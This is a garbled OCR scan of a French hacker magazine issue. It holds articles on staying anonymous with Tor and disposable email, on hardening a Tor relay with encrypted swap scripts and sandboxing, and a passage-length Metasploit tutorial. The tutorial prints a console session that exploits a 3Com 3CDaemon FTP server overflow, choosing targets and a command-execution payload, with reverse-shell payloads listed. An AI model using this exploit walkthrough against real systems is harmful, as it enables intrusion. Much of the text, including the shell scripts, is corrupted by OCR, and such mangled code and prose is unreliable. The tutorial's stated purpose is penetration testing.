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Les nouveaux outils de l'anonymat p.4 





Configurer une plateforme d'anonymat sécurisée 1.8 








:  Metasploit FrameWork Project p.19 
Samy, Yamanner, les vers du Web 2.0 p.16 
Surf Session p.21 
Hash attacks ! p.28 
lus décomplexé que jamais, ce nou- 
veau numéro de Net Secrets vous NuFW, il ne laisse rien passer ! n. 27 
dit tout sur les techniques dernier 
cri pour rester anonyme sur Internet. Pour hien commencer avec Python p.28 
Nous y passons en revue différents outils : 
éprouvés mais, surtout, nous vous appre- : Les houcies p. 36 
nons à configurer votre plate-forme per- : 
sonnelle d'anonymat sécurisé. Si l'envie de + Listes, tuples et dictionnaires np. 39 
vous initier à la programmation vous cha-_ : 


une véritable initiation pratique au lan- 
gage Python. Réputé, à tort ou à raison, 
comme le langage préféré des hackers, il 
est surtout le plus simple à mettre en 
œuvre rapidement, et le plus puissant 
dans ses fonctionnalités. Si vous suivez 
bien nos conseils, et avec un peu de prati- 
que, vous saurez coder au-delà de toutes 
vos espérances. 
Au chapitre sécurité, qui reste la raison 
première d'exister de Net Secrets, nous 
vous présentons en détail EdenWall. Ce 
firewall de la toute dernière génération, 
gratuit sous Linux, possède des pouvoirs 
filtrants et sécurisants jusqu'ici inégalés. À 
son Sujet, certains parlent même de révo- 
lution. Enfin, il faudra voir à l'usage !! 
Toujours dans le domaine de la sécurité, 
nous faisons le point (et des révélations 
exclusives) sur les nouvelles menaces 
liées à l'apparition, aujourd'hui bien instal- 
lée, du Web 2.0. Nouveau web, donc nou- 
veaux virus, nouveaux vers et. nouvelles 
failles ! 
Bonne lecture à tous et n'oubliez pas de 
rester couverts cet êté. 
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LeS NOUVEAUX OU 


Bonus : créer un email intraçable 


Il peut parfois être utile de rester ano- 
nyme lors de la création d'un compte ou 
bien lors de l'accès à certains sites néces- 
sitant une identification. Rester complète- 
ment anonyme n'est pas chose facile en 
raison des multiples traces que nous lais- 
sons tout au long de notre navigation. 


ous allons prendre un cas 

simple : un internaute veut 

accéder de manière ano- 
nyme à un site qui demande une 
authentification. Comment faire 
alors pour rester complètement 
anonyme lors de l'accès à celui-ci 
et surtout éviter tous les pièges 
pour qu'il n'y ai aucune fuite d'in- 
formation ? 


Les traces du 
navigateur 

Les informations que votre naviga- 
teur laisse passer, directement ou 
indirectement, sont très souvent 
négligées, mais permettent, dans 


fe protéger de qui ? 
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bien des cas, d'avoir une idée pré- 
cise sur la personne qui accède à 
un site. En effet, les traces que vous 
pouvez laisser sont multiples 

résolution de l'écran, version du 
navigateur, système d'exploitation, 
heure de la machine, etc. Ainsi, un 
utilisateur se connectant à un site 
sans proxy et qui se reconnecterait 
au même site deux minutes après 
avec un proxy peut facilement être 
identifiable. Ce cas de figure s'est 
déjà vu lors d'analyses de logs : un 
internaute mal intentionné avait 
visualisé certaines pages bien préci- 
ses et quelques secondes après, 
était revenu sur les mêmes pages 
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avec un proxy pour y faire des tests 
douteux. Ceci est d'autant plus 
pour les cookies : lorsqu'un 
utilisateur est automatiquement 
logué sur sa page d'accueil avec un 
proxy , on peut remonter à lui sans 
problème. Si le but des cookies est 
de fournir des informations sur les 
utilisateurs, ce n'est pas pour rien ! 
Pensez donc à tout nettoyer, mas- 
quer les paramètres de votre navi- 
gateur et désactiver tout ce qui est 
en flash (voir l'extension flashblock 
pour Firefox), java et javascript qui 
peuvent récupérer encore plus 
d'informations sur votre naviga- 
teur. || est même conseillé d'en uti- 
liser un spécialement dédié au surf 
anonyme (c'est l'occasion de tester 
Galeon, Opera, etc.), ou au moins 
de créer un profil Mozilla/Firefox 
réservé à ce type d'activité. 
Si vous êtes septique, consultez les 
archives de cette conférence du 
dernier SSTIC : 
http://actes.sstic.org/ 
SSTICO06/Vulnerabilite_des_pos- 
tes clients 


L'adresse IP 

Votre IP est l'information la plus 
critique (c'est l'adresse de votre 
machine), ce qui explique que de 
nombreuses personnes s'interro- 
gent sur la meilleure façon de la 
masquer. Pendant plusieurs années, 
la meilleure solution était de pas- 
ser par un proxy public. 
Néanmoins, un proxy est très lent 
et ne garantit l'anonymat que dans 
une certaine mesure. Si le proxy 
est compromis ou bien si ses logs 
sont accessibles, tout s'effondre et 
la protection n'est plus d'aucune 








1) vulnérabilités sérieuses mais rapidement corrigées ont été décou- 
vertes dans Tor ces derniers moïs. Outre quelques dépassements de 
tampon, une faiblesse dans l'algorithme de routage permettait certaines 
attaques statistiques pouvant révéler, dans certains cas, l'origine des 
paquets. Ce type d'attaques n'est cependant pas facile à mettre en oeuvre 
hors laboratoire, et ne constitue pas un danger sérieux pour un utilisateur 
normal. Maïs si c'est une question de vie ou de mort, il vaut tout de même 
mieux prendre des précautions supplémentaires. 

Les paranoïaques peuvent consulter l'historique des vulnérabilités sur : 
http://tor.eff.org/cvs/tor/ChangeLog 


connexion. 
Mais le logiciel Tor, de l'Electronic 
Frontier Foundation (EFF), est 
maintenant à notre disposition. 
C'est l'outil qui a révolutionné 
l'anonymat. Le fonctionnement de 
Tor est le suivant: le client récu- 
père la liste des serveurs ou des 
noeuds du réseau qui sont répartis 
à travers le monde. Il sélectionne 
un chemin aléatoire vers la cible en 


LOTS 


culiers, et sont généralement mis 
en place par des organisations ou 


des universités. Certaines passerel- 


les n'acceptent que les connections 
vers le port 80 (web);.d'autres ne 
sont pas limitées... 


La communication est entièrement: | 
cryptée du client jusqu'au dernier | 
noeud. Il est impossible de remon- : 
ter à la source à partir-de:la desti- 4 
nation, pas même de savoir si le: 
paquet qui-transite par vous vient. 
directement du noeud qui vous l'a. 
transmis, ce qui garantit un.très 
utilité. Une méthode efficace | passant par plusieurs noeuds, dont | grand niveau de confidentialité. ds 
consistait à chaïner les proxy, ce | le dernier fait office de passerelle. 
qui ralentissait encore plus la | Les noeudé; passerelles sont parti- 


Cerise sur le gâteau : le débit et la: 
latence sont tout à fait acceptables. 
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Installation de tor 

Sous Windows, l'installation est 
tout ce qu'il y a de plus standard. 
Un exécutable à télécharger puis 
quelques clics sur suivant. Il ne 
reste alors plus qu'à lancer tor. Il 
suffit dès lors de configurer votre 
navigateur comme sur la capture 
d'écran. 

Il existe des extensions firefox per- 

















() Direct connection to the Internet 


(®) Manual proxy configuration: 
HTTP Proxy: |locahost 


SSL Proxy: [localhost 


Gopher Proxy: |locahost 





No Proxy for: 


Configure Proxlies to Access the Internet 


(D AUtoO-detect proxy settings for this network | 
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SOCKS Host: 1 localhost 
| Osocks va _ ® socxs ys 
localhost, 127,0.0,1 
_ Example: .mozila.org, netnz, 192,168. 1. EX 
(D Automatic proxy configuration URL: 


V cmple: 
womsEe 2n1/. 20 06/06/msg 
r Free enode : RU: 


mettant d'automatiser cette tâche 
tel que le plugin Tor-Button. Un 
autre outil, SwitchProxy, que nous 
vous avons présenté il y a quelques 
numéros, permet de basculer d'une 
connexion normale à une anonyme 
en un clic. Pensez à bien faire pas- 
ser vos protocoles par privoxy plu- 
tôt que par tor directement pour 
être sûr de votre anonymat. En 
effet, votre navigateur laissera par 
exemple des traces à cause des 
résolutions de noms d'hôtes, par 
DNS, dans le cas contraire. Il est 
également possible de vérifier son 
anonymat en se connectant sur la 
page de vérification (cf. lien). 

Sous linux, il faut installer tor ainsi 
que privoxy. Tous les deux s’instal- 
lent de la manière classique : 
configure && maque suivi d’un 
make install en root. Les plus aver- 
tis choisiront les packages pour 
leur distribution préférée. 
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Une fois installé, ajoutez « forward- 
socks4a / localhost:9050. » dans le 
fichier de configuration de privoxy 
(/etc/privoxy/). Il est important 
également de commenter logfile et 
jarfile en ajoutant un # devant ces 
lignes, afin que privoxy ne log pas 
tout. La configuration des naviga- 
teurs est identique à celle qui a été 
vue sous windows. 

Un des avantages de linux est qu'il 
est possible de tout torifier (non 
ce n'est pas du café) de manière 
très simple : tapez simplement 
torify dans un shell et toutes les 
applications que vous lancerez à 
partir de celui-ci passeront par tor. 
Très pratique pour les connexions 
ssh irc ..… Je vous invite à trouver 
sur le wiki de thehackademy un 
petit script pour votre shell, qui 
vous permettra de toujours savoir 
si vous utilisez tor ou non. 

Il est intéressant de noter que dés- 
ormais, certains sites ou chat 
empêchent l'accès à leurs services 
aux utilisateurs de tor, attention 
donc aux abus … 


Les mails 

Très souvent, pour s'inscrire sur un 
site, il est nécessaire de fournir un 
email valide afin de recevoir un 
code d'activation. Ceci est juste- 
ment fait pour briser l'anonymat 
de l'internaute, qui n’a d'autre 
choix que de fournir sa vraie 
adresse mail. Les possibilités devant 
une telle situation sont assez nom- 
breuses. Fournir sa vraie adresse 
est, bien sûr, hors de question. Le 
premier réflexe serait de créer une 
adresse sur un web mail gratuit. 
Cela devient alors vite fastidieux si 
pour chaque inscription vous devez 
recréer un nouveau mail : parfois, 
on vous en demandera un aussi 
pour le créer (on se mord la 
queue). Réutiliser systématique- 
ment le même faux compte ne 
serait pas non plus une solution car 
si vous l’utilisez fréquemment, vous 
avez toutes les chances d'y laisser 
des traces. Dans tous les cas, un 





Créer une adresse mail intracable 





asta ea! Tor et Privoxy 





>. Crée un profil Mozilla/Firefox que vous n'utiliserez que pour les points 







ss et pour consulter votre courrier par la suite (ou utilisez un autre 
navigateur que celui que vous utilisez normalement) 
ie be Tor sur ce e profil et vérifiez votre un 


istrez-vous sur un webmail grand public avec cette adresse jetable. 


_Pe + haerk le chiffrement SSL de vos connexions, vu que en clair le 
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usage trop fréquent permettra de 
vous créer une nouvelle identité 
numérique ce qui mettra fin à 
votre anonymat. Savez-vous qu’en 
20 questions, il est possible de 
déterminer exactement à quoi 
vous pensez ? 

Une autre solution consiste à utili- 
ser certaines redirections contre le 
spam telles que Trashmail ou 
SpamGourmet. Ces systèmes vous 
permettent de créer une redirec- 


tion temporaire vers votre adresse 


email. Bien entendu, cela ne marche 
que pour le spam car si vous avez 
fourni votre vrai mail à un moment 


ou à un autre, il est possible d'en! 


retrouver la trace. La meilleure 
solution est d'utiliser des mails 


sans aucun mots de passe et acces- |. 


sibles à tous, permettant juste de 


recevoir un code d'activation. C’est. 
ce genre de. service qu'offre 
MyTrashmail. Il vous suffit de taper | 
n'importe quel nom d'utilisateur ét |: à 


vous accèderez à sa mail box. Ainsi 
vous ne laisserez aucune trace, le 


compte précis, mais ceci revient 
alors aux webmail précédents. 


Conclusion 
Maintenir son 


anonymat sur| 


| done certains services utilisés. À vous d'être attentif à cela et responsable. 


Internet n’est pas compliqué d’un 
point de vue technique, mais est 
extrêmement lourd..C'est d'’ail- 
leurs pour cette raison que très 


liens utiles et références 





TOR : 2) 401 
+ http://torefforg/ 


http://www.gnupg.org 

_ TORBUTTON : 

_ htip://frechaven.net/-squires/ 
_ torbutton/ 

_ SWITCH PROXY : 

_ https://addons.mozilla.org/ 
_firefox/125/ 
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souvent, des erreurs sont commi- 
ses et permettent de remonter 
sans trop de problèmes à la source. 
Je pense qu'il est quasiment impos- 
sible de rester en permanence 
anonyme, car on sera obligé à un 
moment ou à un autre de donner 
une information qui compromettra 
tout le reste puisqu’une identité se 
sera créée à travers cet anonymat. 
Les deux meilleurs conseils que je 
peux donner sont de n'être äno- 
nyme que lorsque celaïést vrai- 
ment justifié, car-:à trop vouloir 
être anonyme, on risque defaire 


une erreur à un moment critique. | 


Le second est d'utiliser un système 
totalement différent lors de: phases 
anonymes dans une machine vir- 


tuelle, et qui soit pré-configuré 


pour être détruit après chaque uti- 

lisation. Pour cela Ymware 

offre un player assez lourd 

mais efficace qui peut préve- 
nir de toute fuite d’infor- 
mation s'il est bien confi- 
guré ;) 


VÉRIFIEZ VOTRE CONFIG TOR : 


D http://serifos.eecs.harvard.edu/ 
_cgi-bin/ipaddrpl?tor=1 
. VMPLAYER : 
D http://vmware.com/ 
_ products/player/ 


As À 20 QUESTIONS : 
mail utilisé étant totalement publi: |" 
que. Îl est également possible de 


protéger par mot de passe un 


 http://www.20q.net/ 


| _ SPAMGOURMET : 


. bttp://wwwspamgourmet.com/ 
http: 17 fr Po binail net/ 
_ MYTRASHMAIL : 


“hp //wwwmytrashmail.com/ 
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Nous avons montré l'efficacité de Tor du point 
de vue client, dans l'article précédent sur 
l'anonymat. Celui-ci explique comment renfor- 
cer cet anonymat au niveau du serveur Tor, en 
le sécurisant et en veillant à ce que toutes les 
données sensibles relatives aux activités sur 
le réseau soient protégées au mieux. 





Quelques recommandations pour Tor 


or repose sur un protocole 

de routage de type Onion 

Routing, qui rend pratique- 
ment impossible pour un intrus de 
déterminer à la fois la provenance 
et la destination d'un message. Le 
réseau est composé de noeuds 
inter-connectés, à travers lesquels 
les données sont transportées 
selon un chemin aléatoire reliant la 
source à la destination. Parmi ces 
nœuds, certains font office de pas- 
serelle entre Tor et Internet. 
Les messages sont encapsulés dans 
des couches cryptographiques suc- 
cessives (comme la peau d'un 
oignon) : lors de l'envoi, la source 
choisit les noeuds par lesquels les 
données vont transiter et les 
crypte de manière à ce que chaque 
intermédiaire ne puisse connaître 
que le prochain maillon de la 
chaîne (voir schéma page suivante). 
Ainsi, seul le dernier noeud voit en 
clair le message et la destination 
Internet du paquet. De plus, aucun 
des intermédiaires ne peut savoir si 
un message qu'il reçoit provient 
directement du' noeud précédent 
ou s'il ne faisait que le router. Et 
pour les réponses, un chemin de 
retour est crypté sur différentes 
couches, de la même manière : le 
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destinataire ne peut donc pas 
connaître non plus l'origine du 
message qu'il relaye vers Internet. 
Pour plus de détails sur le fonction- 
nement de Tor, voir les différentes 
sources de documentation sur le 
site officiel : http://tor.eff.org. 

Il existe bien entendu différents 
types d'attaques permettant de fra- 
giliser l'anonymat assuré théori- 
quement par Tor, notamment au 
niveau du protocole, en utilisant 
des analyses temporelles. 
Cependant, ces attaques ne sont 
possibles que si l'intrus contrôle un 
certain nombre de nœuds du 


se te sé une atEption française de The Onion Router 
ational Security, How to Run a Secure Tor Server, disponible 
L ne ceptralse bon AGE de documents rela- 


qu des noue en ne de ce qui concerne spécifiquement Tor, 

nne i dée des possibilités de sécurisation disponibles actuellement. 
a u pe rincipaux du document original sont Chris Palmer, Roger 
led dine _et Nick Mathewson. Cette version française est disponible 
 licenc C € li br > sur ee sedinde auprès de la rédaction. 


bixon ocre 1y/TheOnionRouter/OperationalSecurity 


réseau. Par conséquent, la sécurité 
de chaque serveur Tor qui consti- 
tue le réseau est relativement 
déterminante pour la sécurité du 
tout. Ce document donne quelques 
conseil pour renforcer cette sécu- 
rité, là où elle est la plus impor- 
tante. 


Chiffrement des 
partitions de stockage 
et de swap 

La seule information sensible d'un 
serveur Tor est sa clé privée 
(stockée par défaut dans 
lusr/local/etc/tor/keys — qui ne doit 





= 


| 
| 
| 


être lisible que par l'utilisateur 
dédié au serveur). Des informations 
permettant de la compromettre ou 
de la reconstituer peuvent se 
retrouver en mémoire, et notam- 
ment dans la swap. Il convient donc 
de configurer avec précision les 
permissions d'accès des fichiers et il 
est recommandé d'utiliser des par- 
titions chiffrées pour les stocker 
| ainsi que pour la swap. Voici com- 
| ment procéder sur les principaux 
systèmes d'exploitation. 
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| Linux 2.4 

| Avec un Kernel 2.4, il y a deux: 
moyens d'utiliser des partitions 
chiffrées : loop-AES, distribué sous 

la forme d'un module kernel, êt 
Cryptoloop. qui est un patch à! 
ajouter au kernel officiel. | 
On peut télécharger loop-AES sur |! 
http://loop-AÂES.sf.net. : 
C'est la version générique la plus:|: 
commode, vu qu'elle ne nécessite |. 
normalement pas une recompila= | 
tion du noyau. Cependant, le patch |! 
Cryptoloop est intégré par défaüt: |: 
aux kernels fournis par certaines |: 
distributions (notamment Gentoo|. 
et Mandriva). jRe 
Il peut être fastidieux d'appliquer le: | 
patch soi-même. Pour ceux qui | 
sont intéressés, la version la mieux |: 
maintenue est appelée loop-jari où |. 
patch- -cryptoloop-jari ; , la version |: 
correspondant à votre kernel est | 
facilement identifiable grâce | à 
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Principe de l'Onion Routing 
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Script pour une partition de swap chiffrée 





L° script qui suit permet de créer au démarrage deux partitions cryp- 
tées, stockées respectivement dans /dev/hda2 (pour la swap) et 
/dev/hda5 (pour /tmp), avec AES, Le deux nouveaux devices, utilisables 
par mount ou swapon, seront /dev/loopl et /dev/loop3. 

#1/bin/sh | 


## Génération de mot de passe aléatoire 
pwOX 
dd f=/dev/urandom bs=1 count=256 2> /dev/null \ 
| head -n 2 | tail-n 1 | tr [+/=] 0-9 
} 


190060606005 6666050000850%00R90e SN TILL ITR. 


Cryptoloop-HOWTO) pour plus 
d'information à ce sujet. 

Voir le script ci-contre pour un 
exemple de mise en place d'une 
partition de swap cryptée. Il existe 
des solutions plus robustes, notam- 
ment EncSwap : 
http://www.northernsecurity.net/ 
download/encswap.tar.gz. 


Linux 2.6 

Sur une Debian, avec un Kernel 2.6, 
il suffit d'installer le paquetage 
cryptsetup. 


— ‘em, 
= Rreer 


La version par défaut du noyau 
intègre déjà le support DM-CRYPT, 
qui est la manière la plus efficace 
de mettre en place un cryptoloop 
sur une version 2.6. Il faut veiller à 
l'activer manuellement si l'on utilise 
un noyau customisé. 
On peut alors spécifier dans 
letc/crypttab les partitions de 
stockage et les clés.Voici comment 
configurer les mêmes partitions 
que dans le script vu plus haut : 
# Utarget deviceU Msource 
deviceU Mkey fileU MoptionsU 
swap /dev/hda2 /àev/urandom 


echo -n "Création du swap-device chiffré... " 
# remise à zéro 
swapoff /dev/loopl 

} losetup -d /dev/loopl 


## initialisation du loop : 

pw | losetup -e aes -k 256 -p 0 /dev/loopl /dev/hda2 
mkswap /dev/loopl # formatage de la swap 

swapon -p | /dev/loopl # activation 


echo -n "Création d'un /tmp chiffré... " 
# remise à zéro 

umount /dev/loop3 

losetup -d /dev/loop3 


## initialisation du loop : swap 
pw | losetup -e aes -k 256 -p 0 /dev/loop3 /dev/hda5 2 /äev/hda5 /âev/uranäon 
mp 


mkfs -t ext2 /dev/loop3 # formatage ext2 
mount -0 nosuid,nodev -t ext2 /dev/loop3 /tmp 


chmod 1777 /tmp Il faut ensuite spécifier dans 


letc/fstab les points de montage : 


Google. Une version relativement 
récente du patch est disponible à 
cette adresse : 
http://northernsecurity.net/ 
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M: à jour : garder son système à jour est la mesure de sécurité la 
plus facile à mettre en oeuvre, et reste l'une des plus importantes. 


Pour activer le chiffrement, il faut 


. Spécifier 


CONFIG _BLK_DEV CRYPTO- 
LOOP=Y lors de la configuration 
du noyau, et spécifier l'algorithme 
choisi. Les outils (user-land) d'ad- 
ministration des loops sont norma- 
lement distribués sous forme de 
paquetage dans les principales dis- 
tributions. On peut se référer au 
Cryptoloop HOWTO (disponible 
à l'adresse 

http://wWwww.tidp.org/HOWTO/ 


N'hésitez pas à utiliser le système de paquetages et de mises à jour auto- 
matiques de votre distribution. 


Désactiver les services inutilisés : il est également capital de ne faire 
tourner que ce dont vous avez besoin. Plus vous faites tourner de services 
accessibles depuis l'extérieur (ou pas), plus vous augmentez les chances 
que l'un d'eux comporte une vulnérabilité inédite, qui permettrait une 
intrusion en direct ou automatisée (worm). Limiter le nombre d'applica- 
tons installées facilite également le maintien des mises à jour. 


Sécurité physique : il est important de garder un serveur sensible sous 
clé. Même si les partitions sont cryptées, un accès physique à la machine 
permettrait différents scénarios d'attaque qui rendraient caduques toutes 
les protections mises en place. 








/äev/mapper/tmp /tmp ext2 

defaults O0 2 

/äev/mapper/swap none swap sw 

0 0 

Après redémarrage, on peut véri- 

fier que tout est en ordre. 

L'utilitaire dmsetup doit afficher 

quelque chose comme : 

tmp: O0 979902 crypt aes-cbe— 

plain 984...497d4 O 3:5 
0 

swap: O0 1959950 crypt aes— 
cbc-plain 302...389e9 O 
332 O 

Pour les autres distributions, on 

peut suivre les instructions généra- 

les données sur 

http://wWww.saout.de/misc/ 

dm-crypt, ou se rapporter à la 

documentation officielle de la dis- 

tribution. 


. Le chiffrement de la swap est pos- 
-sible depuis 


la version 5.3- 
RELEASE de FreeBSD. Il existe plu- 
sieurs alternatives. 

Il faut d'abord préparer la partition 
de stockage qui sera utilisée : 

# àd if=/dev/ranäom 
of=/âev/ad0s1lb bs=lm 
Ensuite, on configure via /etc/fstab |! 
son utilisation pour la swap: 
/äev/ad0slb.bde none swap s\i. 

0 O 


On peut substituer /dev/ad0s1b. eli 


à /dev/ad0s 1 b.bde, pour utiliser geli 


plutôt que gdbe comme moteur |: 


crypto. 

Plus de détails sur : 
http://www.freebsd.org/doc/ 
en_US.IS08859-1/books/ 
handbook/swap- -encrypting.html : 


Le mécanisme général de chiffres! : 
ment de partition est présenté ici | 
http://wWww.freebsd. org/dobll 
en_US.ISO8859-I Ibeokes 


handbook/disks-encrypting. html ? 
OpenBSD 


Le support de chiffrement de: k | 
swap est inclus depuis longtemps. MES 


dans OpenBSD. Il suffit pour l'acti: 


7: 
a $ 
] 
} 
{ 
} 








“Dôns le. cas. de Tor. L la meilleure 
politique reste de ne gardes aucun og” 


sysctl w Vin. swapencrypt Fabien | 
On peut. aussi 1e faire dans 
| Jetc/sysctl. conf. HER : 
Pour chiffrer der AMOGehEs id 
fichiers, on peut se rapporter aux 
[instructions données ici : 
14lhttp://web.archive.org/web/ 

je 120050310041 132/http://www. 
#Hbackwatcher.org/writing/hhowtos/ 
‘&bsd-encrypted-filesystem.html 
On peut également utiliser tout 
Simplement la mémoire vive (mfs) 
| stocker des fichiers tempo- 


‘aires, en spécifiant dans /etc/fstab : 


| /aev/waob /timp mfs rw,nodev, 


nosuids»#52153600 O 0O 
Jaev/waov /vaxr/tmp mis 
rwsnodev» 


SAR nosuid,;-5#153600 O © 


HET 
ses 


ver de taper : ji ip 


Ah pe 


On peut ur Windows pour 
que la swap soit effacée à chaque 
arrêt 


propre du système 
(Computer Configuration  -> 
Windows Settings -> Security 
Settings -> Local Policies -> 
Security Options : Shutdown, Clear 
virtual memory pagefile). 

Le chiffrement des partitions peut 
être assuré à l'aide de différents 


outils, comme BestCrypt 
(http://wwvw.jetico.com/index.htm 
#/bcrypt7.htm), CrossCrypt 


(http://www.scherrer.cc/crypt/). 
Sur XP on peut aussi utiliser le chif- 
frement natif (NTFS seulement) 
pour le répertoire de Tor (voir les 
propriétés du dossier). 
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Minimiser la rétentions 
des données 

La mise en place d'une plateforme 
d'anonymat nécessite d'accorder 
une attention toute particulière 
aux logs. Ils pourraient en effet 
contenir des informations permet- 
tant de connaître par recoupement 
diverses informations nuisibles à 
l'anonymat des utilisateurs du ser- 
veur. 

Il faut étudier dans les détails la 
configuration de votre système de 
log, afin de ne retenir que le mini- 
mum nécessaire au fonctionne- 
ment de votre infrastructure. Il est 
possible, notamment, de configurer 
la rotation de vos fichiers de log 
pour qu'ils soient effacés périodi- 
quement (il existe plusieurs techni- 
ques d'effacement de fichier résis- 
tant à la récupération de données, 
notamment wipe : 
http://abaababa.ouvaton.org/wipe/. 
Dans le cas précis de Tor, la meil- 
leure politique reste de ne garder 
aucun log. 

L'Electronic Frontier Foundation (à 
l'origine du projet Tor) a également 
rédigé quelque recommandations 
générales sur la rétention des don- 
nées, disponibles ici : 
http://www.eff.org/osp/ 
20040819_OSPBestPractices.pdf. 
Ce document s'adresse d'abord 
aux fournisseurs d'accès, mais 
comporte de nombreuses informa- 
tions intéressantes hors de ce 
contexte. 
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Tor dans un 
environnement restreint 
Il est conseillé de faire tourner Tor 
dans un environnement restreint, 
par soucis de cloisonnement, mais 
aussi, comme pour tout autre ser- 
vice accessible depuis l'extérieur, 
afin d'éviter qu'une éventuelle faille 
dans celui-ci ne permette de com- 
promettre tout le système. 

Tor dans un chroot 

Le chroot est la technique de cloi- 
sonnement de base, disponible sur 
beaucoup de systèmes de type 
UNIX. 

La procédure détaillée permettant 
de faire tourner Tor dans un chroot 
est donnée dans ces deux docu- 
ments : 

° http://wiki.noreply.org/ 
noreply/TheOnionRouter/TorinCh 
root 

* http://wiki.noreply.org/noreply/ 
TheOnionRouter/OpenbsdChroot 
edTor 


Systrace 

Systrace est un système de restric- 
tion des appels système qui permet 
de définir avec précision ce qu'un 
processus peut et ne peut pas faire. 
Développé à l'origine pour 
OpenBSD, il est également disponi- 
ble pour Linux. 

Tor peut tourner dans cet environ- 
nement. Pour ‘générer une politi- 
que de sécurité de base pour Tor 
on peut utiliser la commande : sys- 
trace -A tor. || faut ensuite l'affiner, 





en se basant sur l'exemple donné 
dans l'original de ce document : 
http://wiki.noreply.org/noreply/ 
TheOnionRouter/OperationalSecu 
rity. On l'active ensuite en lançant 
tor avec systrace 


Grsecurity 

GRSecurity est un patch pour le 
noyau Linux, permettant également 
de limiter l'accès aux appels sys- 
tème en fonction du programme 
(RBAC : role based access control). 
L'utilitaire gradm permet d'activer 
les politiques .stockées dans 
letc/grsec/policy/. 

Vous trouverez dans le document 
original un exemple de politique 
testé sur Debian. 


DronMyRights (Windows) 

Depuis XP et Server 2003, il existe 
également un système de politi- 
ques de restriction pour Windows, 
baptisé SAFER. Cela est notam- 
ment utilisé pour faire tourner des 
applications à risque (Internet 
Explorer, Outlook, etc.) en tant 
qu'administrateur, tout en abaissant 
son niveau de privilèges. 

On peut utiliser un programme 
nommé DropMyRights afin de tirer 
parti de cette fonctionnalité. Une 
guide en anglais est disponible sur 
MSDN : 
http://msdn.microsoft.com/ 
library/default.asp?url=/library/ 
en-us/dncode/html/ 

securel | 152004.asp 

On peut utiliser la même méthode 
pour faire tourner Tor. 









très grande variété d'outils et surtout té 
d’exploit à dispositions. 


ette tâche est d'autant plus 
ardue que, les exploits 
n'étant pas tous sous le 
même format et ayant des noms 
quelques peu mystiques, s’y retrou- 
ver devient alors un exploit (le jeu 
de mot !).C'est alors qu'intervien- 
nent les frameworks de tests d’'in- 


trusion. || en existe actuellement: 


trois bien implantés : payants 
comme Core Impact[l] ,CAN- 


VAST[2] ou libre comme Metasplos, 


les différentes options 


version 


C’est donc tougffftirellement que 


‘significative de éx| loits, mais f 


He, 
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Fr 
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nous nous intéresserons au der- 
nier. EE 

Le frame Metasploit permet 
d’ incorporer tous ses exploit et de 












| pl 
Metasploit l'outil des penterster 


L'exercice du test d’instrusion est 
beaucoup plus dure en pratique qu'il 
n’y paraît. En effet, les réseaux et sys- 
tèmes étant tous différents, tout pen- 
tester doit avoir à sa disposition une 
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Metasploit FrameWork Main Console Help 


? Show the main console help 

cd Change working directory 

exit Exit the console 

help Show the main console help 

info Display detailled exploit or payload information 
quit Exit the console 

reload Reload exploits and payloads 

save Save configuration to disk 

setg Set a global environment variable 

show Show available exploits and payloads 
unsetg Remove à global environment variable 


use Select an exploit by name 
Show console vérsion 
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clicks permet de mener une atta- 
que à bien, ou un mode console 
légèrement plus complexe, mais 
tellement plus rapide lorsque l’on 
sait s’en secvir. Dans tous les cas, il 
suffit de sélectionner l'exploit que 
l'on veut utiliser, ainsi que sa charge 
utile (notamment  BindShell). 
Plusieurs dizaines d'exploits sont 
intégrés, dont par exemple DCOM 
RPC[5] et les failles sur serveur 
Apache!6]. 

L'environnement Metasploit se 
révèle donc d'une approche rapide 
et intuitive. De plus, la nature 
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+ = = mofconsole v2.3 63 exploits = 69 payloads 


msf U use 5com_ 3cdaemon_ ftp overiiow 
msi 5com 5cdaemon_ftp_overflow U Set RHOST 127,0.0.1 


RHOST Ù 127.0.0.1 


msf 5com_ 5cdaemon_ftp overflow U set RPORT 21 


RPORT =U 21 


msi 5com_ 5cdaemon_ ftp overflow U show targets 
supported Exploit Targets 


ZESSSSSSSSSSSSSSSSNUSSLNNE 
Q windows 2000 English 
1 windows XP English SP0O/SPL 
2 Windows NT 4.0 SP4/SP5/SP6 


msi 35com_5cdaemon_ ftp _overfiow U set target 1 


target —UÙ 1 


ms 5com_5cdaemon_ ftp _overfiow U show payloads 
hetasploit Framework Usable Payloaûs 


win32 exec 


win92_ reverse ord 


Windows Execute Command 
windows Staged Reverse Ordinal Shell 
win32_reverse _ord vneinject Windows Reverse Ordinal VNC Inject 


msi 3com 3cdaemon_ ftp _overilow U set payload win32_exec 
payload =U win32_exec 


* WARNING: 


the correct case of the 


‘payload' variable is 


IPAYILOAD'# 


msf 5com_5cdaemon_ftp overflow(win52_exec) U set CMD "netstat -an" 


CUD =U netstat an 
the correct case of the 


* WARNING: 


‘target! variable is 


TARGET 


* Attempting to exploit Windows XP English SP0/SP1 
msi 3com_3cdaemon_ftp_overflow(”in32 exec) U °C 
Administrateur Vblacmmesa - 


 OpenSource du projet facilite son 


développement durable. Véritable 
arsenal pour les pirates en herbe 
mais surtout outil précieux pour 
les experts en méthodes d'intru- 
sion, Metasploit à pour vocation de 
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devenir l'outil incontournable en 
matière de sécurité informatique. 

À titre d'exemple, nous allons 
exploiter 3Com 3CDaemon FTP 
Server. Nous débutons notre ses- 
sion Metasploit sans plus tarder. 


s d’une he ataque. de poste cent celui-ci est quasi systématiquement 
SOUS windows. La majorité des shellcodes existant ne fond que binder 
€ sn Je meilleur des cas un 1 simple reverse connecte. Mais 


wi one. cs en De et vous aurez alors quelques 
e plus | tard l'écran de la machine cible qui apparaîtra. Ce shell- 
es ttc (out {simplement ultime et a tester de toute urgence. 


Voir l'exemple de session ci- 
contre. 

En Bleu figure les commandes ins- 
crites par l'utilisateur, le reste cor- 
respondant aux différentes sorties 
de texte en mode console. Vous 
noterez qu'il s'agit simplement de 
spécifier l'ensemble des arguments 
attendu sans oublier le protocole 
adéquat. Une commande info sur 
l'application en étude permet d'ob; 
tenir toutes les informations 
nécessaires sur les bons usages 
(info 3com_3cdaemon ftp_over- 
flow). 

Chacun des champs doit être rem- 
pli selon un certain respect du pro- 
tocole quoique le Metasploit 





FrameVVork Project autorise une 
mauvaise casse des caractères. 
Pour notre exploit sur le serveur 
FTP vulnérable, il faudra configurer 
notre exploit ainsi : 

Définition de l'exploit : 

use 3com 3cdaemon ftp _over- 
flow 

Définition de l'adresse IP (locale) : 
set RHOST 127.0.0.I 

Définition du point d'entrée 
(port) : 

set RPORT 21 

Définition de l'Operating System : 
set TARGET | 

Définition de la charge utile : 

set PAYLOAD win32 exec 
Procède à l'exploitation : 

exploit 

